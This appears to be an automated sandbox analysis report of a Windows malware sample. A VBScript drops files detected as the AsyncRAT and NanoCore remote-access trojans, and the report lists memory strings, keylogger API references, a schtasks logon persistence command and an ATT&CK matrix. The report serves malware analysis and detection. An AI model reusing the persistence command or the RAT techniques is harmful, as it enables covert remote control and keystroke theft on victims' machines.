            Source: Notepads.exe, 0000001A.00000003.562007200.000000001C859000.00000004.00000001.sdmpBinary or memory string: lows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual TLB Size53004K GPA pages53022M GPA pages53041G GPA pages5306512G GPA pages53084K device pages53102M device pages53121G device pages5314512G device pages5316Attached Devices5318Device Interrupt Mappings5320I/O TLB Flushes/sec5322I/O TLB Flush Cost5324Device Interrupt Errors5326Device DMA Errors5328Device Interrupt Throttle Events5330Skipped Timer Ticks5332Partition Id5334Nested TLB Size5336Recommended Nested TLB Size5338Nested TLB Free List Size5340Nested TLB Trimmed Pages/sec5342I/O TLB Flushes Base5344Hyper-V Hypervisor Root Virtual Processor5346Total Run Time5348Hypervisor Run Time5350Remote Node Run Time5352Normalized Run Time5354Hypercalls/sec5356Hypercalls Cost5358Page Invalidations/sec5360Page Invalidations Cost5362Control Register Accesses/sec5364Control Register Accesses Costm
            Source: Notepads.exe, 0000001A.00000002.602077187.000000001BE94000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWance%SystemRoot%\system32\mswsock.dll2e,00,4e,00,45,00,54,00,20,00,43,00,4c,00,52,00,20,00,44,00,61,00,74,00,61,00,00,00,00,00.NET CLR Data6
            Source: ame.exe, 00000003.00000002.553947703.000000001B080000.00000004.00000001.sdmpBinary or memory string: Hyper-V mrytefrbsbkgqcx Bus
            Source: ame.exe, 00000003.00000003.526118644.000000001C031000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000003.574433837.000000001BCD9000.00000004.00000001.sdmpBinary or memory string: oteFX Synth3D VSC VM Transport Channel8260Number of space available signals received8262Number of space available signals received per second8264Number of data available signals received8266Number of data available signals received per second8268Number of space available signals sent8270Number of space available signals sent per second8272Number of data available signals sent8274Number of data available signals sent per second8276Number of data available event was reset8278Number of data available event was reset per second8280Number of space available event was reset8282Number of space available event was reset per second8244RemoteFX Synth3D VSC VM Device8246Number of created VMT channels8248Number of waiting VMT channels8250Number of connected VMT channels8252Number of disconnected VMT channels8254Total number of created VMT channels8256Number of RDVGM restarted notifications7320WorkflowServiceHost 4.0.0.07322Workflows Created7324Workflows Created Per Second7326Workflows Executing7328Workflows Completed7330Workflows Completed Per Second7332Workflows Aborted7334Workflows Aborted Per Second7336Workflows In Memory7338Workflows Persisted7340Workflows Persisted Per Second7342Workflows Terminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual
            Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmpBinary or memory string: Hyper-V Hypervisor
            Source: wscript.exe, 00000001.00000002.335790807.0000016C16B30000.00000002.00000001.sdmp, ame.exe, 00000003.00000002.534824557.0000000000C10000.00000002.00000001.sdmp, fi.exe, 00000004.00000002.601520642.0000000005AA0000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.602647753.000000001C4D0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: Notepads.exe, 0000001A.00000003.562291823.000000000154D000.00000004.00000001.sdmpBinary or memory string: Hyper-V mrytefrbsbkgqcx BusM
            Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmpBinary or memory string: !Hyper-V Hypervisor Root Partition
            Source: ame.exe, 00000003.00000002.534630144.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: Hyper-V mrytefrbsbkgqcx Bus Provider PipesP
            Source: wscript.exe, 00000001.00000002.335790807.0000016C16B30000.00000002.00000001.sdmp, ame.exe, 00000003.00000002.534824557.0000000000C10000.00000002.00000001.sdmp, fi.exe, 00000004.00000002.601520642.0000000005AA0000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.602647753.000000001C4D0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: ame.exe.1.drJump to dropped file
            .NET source code references suspicious native API functionsShow sources
            Source: ame.exe.1.dr, Client/Handle_Packet/HandleLimeLogger.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleLimeLogger.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: dhcpmon.exe.4.dr, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.csReference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.csReference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.csReference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.csReference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.csReference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\ame.exe 'C:\Users\user\AppData\Local\Temp\ame.exe' Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\fi.exe 'C:\Users\user\AppData\Local\Temp\fi.exe' Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs' Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess created: C:\Users\user\AppData\Roaming\Notepads.exe 'C:\Users\user\AppData\Roaming\Notepads.exe' Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exeJump to behavior
            Source: fi.exe, 00000004.00000003.454678808.00000000008D7000.00000004.00000001.sdmpBinary or memory string: Program Manager
            Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: fi.exe, 00000004.00000003.570431620.00000000008C1000.00000004.00000001.sdmpBinary or memory string: Program Manager*
            Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmpBinary or memory string: &Program Manager
            Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: fi.exe, 00000004.00000003.366597291.00000000008D7000.00000004.00000001.sdmpBinary or memory string: Program Manager|
            Source: fi.exe, 00000004.00000003.559369359.000000000087F000.00000004.00000001.sdmpBinary or memory string: =rProgram Manager
            Source: C:\Users\user\AppData\Local\Temp\ame.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ame.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeQueries volume information: C:\Users\user\AppData\Roaming\Notepads.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeQueries volume information: C:\Users\user\AppData\Roaming\Notepads.exe VolumeInformation
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings:

            barindex
            Yara detected AsyncRATShow sources
            Source: Yara matchFile source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.325883789.0000016C16535000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.329227770.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.592748395.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.325568596.0000016C16534000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.540116031.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.533753846.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ame.exe PID: 6592, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Notepads.exe PID: 5444, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Notepads.exe PID: 2152, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Notepads.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ame.exe, type: DROPPED
            Source: Yara matchFile source: 3.0.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c1711f630.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.0.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c1711f630.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.129567e0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.0.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.2.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.wscript.exe.16c165eefd0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.129567e0.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE

            Stealing of Sensitive Information:

            barindex
            Yara detected Nanocore RATShow sources
            Source: Yara matchFile source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: fi.exe PID: 6616, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED
            Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
            Source: Yara matchFile source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            barindex
            Detected Nanocore RatShow sources
            Source: wscript.exe, 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: fi.exeString found in binary or memory: NanoCore.ClientPluginHost
            Source: fi.exe, 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Source: dhcpmon.exeString found in binary or memory: NanoCore.ClientPluginHost
            Source: dhcpmon.exe, 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Source: dhcpmon.exe.4.drString found in binary or memory: NanoCore.ClientPluginHost
            Yara detected Nanocore RATShow sources
            Source: Yara matchFile source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: fi.exe PID: 6616, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED
            Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
            Source: Yara matchFile source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_023428EA bind,4_2_023428EA
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_023428A9 bind,4_2_023428A9

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsScripting221Windows Service2Access Token Manipulation1Disable or Modify Tools1Input Capture121File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsNative API1Scheduled Task/Job2Windows Service2Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery13Remote Desktop ProtocolInput Capture121Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsExploitation for Client Execution1Logon Script (Windows)Process Injection12Scripting221Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
